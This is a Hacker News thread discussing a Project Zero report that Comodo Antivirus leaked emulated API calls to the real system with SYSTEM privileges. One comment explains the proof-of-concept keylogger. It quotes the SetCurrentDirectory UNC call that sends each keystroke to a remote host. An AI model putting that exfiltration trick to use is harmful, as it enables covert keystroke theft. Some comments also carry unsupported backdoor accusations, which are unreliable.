
Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans - cespare
https://bugs.chromium.org/p/project-zero/issues/detail?id=769
======
willvarfar
Google's Project-Zero
[https://en.wikipedia.org/wiki/Project_Zero_(Google)](https://en.wikipedia.org/wiki/Project_Zero_\(Google\))
is absolutely excellent! Google task top-notch engineers to find zero-day bugs
in _other company 's_ products, making us all safer.

Very big kudos to Google! The flood of bugs they keep finding and getting
other companies to fix is fantastic!

~~~
jlgaddis
Indeed, they've done some great work.

It's times like this that make me I'm glad I'm not a developer. If I were, I'd
be forever worried that today is the day I open up my mail client and see a
new message from 'taviso@'.

~~~
CiPHPerCoder
I'd look forward to it, personally, but I like learning new things about
security.

------
dkopi
When it comes to security research, Tavis Ormandy is truly inspirational. It
isn't just about the bugs he discovers, but I find his explanations often very
simple to understand.

This is an extremely severe design issue, where an Anti Virus can not only be
bypassed, but it can actually be used to compromise an attacked system. Comodo
runs suspicious code inside an emulator(VM), but instead of implementing full
OS emulation, they allow a lot of the API calls inside the emulator to leak
out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM
privileges(The windows equivalent of root).

The exploit code serves as a simple key logger, by repeatedly calling
GetKeyState(With system privileges!), and leaking this information to a remote
server using the SetCurrentDirectory() API (By calling
SetCurrentDirectory("\\\\\\\?\\\UNC\\\192.168.237.1\\\<Pressed key>")

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!"
comment.

~~~
vog
_> This is an extremely severe design issue, where an Anti Virus can not only
be bypassed, but it can actually be used to compromise an attacked system._

Don't we have exactly that design issue in _all_ anti-virus tools, by
definition?

All potentially dangerous data is routed through that single tool that runs
with high permissions and performs complex computations. Every single
programming error in the anti-virus tool (e.g. a buffer overflow) can
potentially lead to a compromised system. An attacker can now choose not just
between vulnerabilities of browser, mail client and operating system, but also
use vulnerabilities of the anti-virus tool.

So anti-virus is by definition a tool with complex behaviour and a large
attack surface.

For many security people, this alone qualifies anti-virus tools as additional
threat, not as part of the solution - even without dramatic failures as shown
in this particular case.

------
sccxy
Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

[https://news.ycombinator.com/item?id=9091917](https://news.ycombinator.com/item?id=9091917)

Comodo “Chromodo” Browser disables same origin policy

[https://news.ycombinator.com/item?id=11021633](https://news.ycombinator.com/item?id=11021633)

Comodo Internet Security installs and starts a VNC server by default

[https://news.ycombinator.com/item?id=11129170](https://news.ycombinator.com/item?id=11129170)

~~~
AdmiralAsshat
There is no doubt some engineer at Comodo whose heart sinks every time he/she
thinks Tavis is done tearing their software apart and opens their bug reports
to find _yet another_ gaping security hole.

------
vog
Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by
design)

2) how they "fixed" it. (not questioning their design at all)

The whole bugreport reads like an invitation to find more creative
combinations of API calls that their filter forwards to the system. From the
first comment:

 _> They're planning to fix those two issues and review all the remaining
API's for missing parameter filtering, but wanted to know if I agree that
their design is sound. I said I suppose they're correct in theory, but this is
a lot of attack surface [...]_

~~~
ikeboy
>We have also disabled this feature by default UNTIL we complete the security
review.

So creative combinations won't help until they reenable it.

------
wjnc
My first thought is: so now I am relying on a company that basicly provides me
free services for security audits of other companies, some of which I pay for
the services they deliver. (Last one is a stretch.) Of course, I rely on many
free things, but it's the second order aspect here that troubles me.

Is there an indication of the complexity of the bugs they are finding? Are
they among those that should be caught be QA?

~~~
ploxiln
It's a new kind of incompetent-but-too-big company: "too big for google to not
give you free expert security review". Well, it's just for companies that can
make google's stuff look bad when they enable users to be badly infested with
malware.

The magnitude of it in this case is pretty funny ... can you imagine Comodo
"security suite" or whatever just 3 months ago? A special secure browser
without secure origin policy, a local poorly secured vnc server, a scanning
and parsing engine that continually exposes itself to un-trusted input but has
ASLR disabled ...

Most of these are not really complicated, they're bad feature ideas. But mass-
market security products are feature-driven, not security-driven. So it makes
sense that they suck at security.

------
cesarb
Looking at this issue and the the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT
AUTHORITY\SYSTEM", instead of farming them to less privileged processes?

~~~
mtgx
From the many issues I've seen with Comodo products, either they don't know
what they are doing or are doing it on purpose this way (plausible deniability
backdoors).

------
Natanael_L
Never trusted the sandbox functionality. I've been installing Comodo CIS with
only the firewall and antivirus, sandboxing disabled, HIPS on low settings on.
Any notable exploits left that would bypass that?

~~~
ionised
I basically just use it for the Firewall and HIPS too, because I cannot find
another free firewall solution (that isn't Windows firewall) that is any good,
and I cannot find any other example of an HIPS that is as easy to set up and
run as the Comodo one.

That said, I'm getting seriously tired of their shadyness/incompetence
recently.

I need alternatives.

~~~
amluto
> that isn't Windows firewall

What's wrong with Windows firewall/defender/anti-virus/whatever it's called
these days? It's free, it doesn't try to market itself to you, it doesn't
smell like malware, and it doesn't seem to show up in these regular sweeps of
disastrous security bugs in the third-party solutions.

~~~
obsurveyor
Windows Firewall has the annoying habit of letting stuff work until one day it
just starts doing its job and doesn't. Typically this is through user prompts
that either get spacebar'd away due to focus stealing* or blocked because the
user doesn't know what it's asking about.

It's a mess working out what it's doing, fixing it and explaining to the user
why their perfectly working system just broke. It could really use some
organization tools like the Task Scheduler.

*I thought Microsoft promised at one point around the lead up to Windows 7 that they were going to address their stealing focus issues.

------
jwr
"used to forward", from what I understand this has been fixed.

~~~
willvarfar
Would you trust them to fix it?

Seems such a big red flag (as though things couldn't get worse for AV-cred
these days).

~~~
Kliment
It's a huge red flag - they've temporarily disabled the function while they
audit all APIs they're calling, but they still believe their core design is ok
- this means they'll go back to emulate with pass-through everything that THEY
can't figure a way to exploit.

~~~
dkopi
It's a double edged sword. Emulating all the OS functions is probably an
impossible task for them at the moment. It isn't just about implementing all
the OS calls, it's also about implementing them in a way that doesn't allow
malware to detect that it's running inside of an emulator.

~~~
toyg
The sheer wtf of having "windows running on windows" is worth of discarding
this AV entirely. How do you like running TWO operating systems at all times?
And people wonder why AVs make powerful machines struggle under minimal
load...

~~~
tsujamin
your post reminded me of two cool stories about "Windows on Windows"

1\. Microsoft has reimplemented the NT kernel and services as a userspace
LibraryOS called Drawbridge
([http://ssrg.nicta.com.au/Events/summer/16/baumann.pdf](http://ssrg.nicta.com.au/Events/summer/16/baumann.pdf),
slide 21)

2\. Microsoft teecchniiccaally also already did this in SysWOW64

First story is much more interesting than the second one

~~~
21
As the funny fact goes, in the System32 directory you have 64-bit binaries,
and in the SysWOW64 directory you have 32-bit binaries.

~~~
CWuestefeld
The reason for the 64-bit stuff in the System32 directory makes sense - they
need to ensure that the currently-used DLLs and stuff are in the directory
that legacy software is looking at.

On the other hand, the SysWOW64 thing could sure have been named better, to
make the whole thing clear.

~~~
ptx
> The reason for the 64-bit stuff in the System32 directory makes sense - they
> need to ensure that the currently-used DLLs and stuff are in the directory
> that legacy software is looking at.

Why? There was no legacy 64-bit software. So any software needing to find the
64-bit system directory needed to (at the very least) be recompiled, but
probably needed lots of other small changes as well. So why couldn't one of
those simple required changes (to create 64-bit versions of legacy software)
be to change the path from which it loads its DLLs?

~~~
toyg
See [http://brandonlive.com/2008/12/22/why-does-windows-
put-64-bi...](http://brandonlive.com/2008/12/22/why-does-windows-put-64-bit-
binaries-in-system32/)

------
justsaysmthng
My god what a mess. I think virus writers and hackers should specifically
target anti virus suites, given how much of a security risk these pose to the
user. Heh, I guess they do just that. I wouldn't be surprised if some of the
virus and anti-virus writers are one and the same people or organizations.
Because it makes a lot of sense - open the door to intruders and then tell
users it's their fault, then manipulate them into buying your security
product. Rinse and repeat and make millions.

------
RubyPinch
Does anyone have any good experiences with any anti-virus software?

~~~
woodman
17 years ago I used F-prot to disinfect my school's computer lab after it was
completely overrun by the Melissa worm. The antivirus industry has certainly
earned its terrible reputation, but F-prot was actually pretty good software.
It was the first with a heuristics engine, and I remember it actually working
on a few occasions.

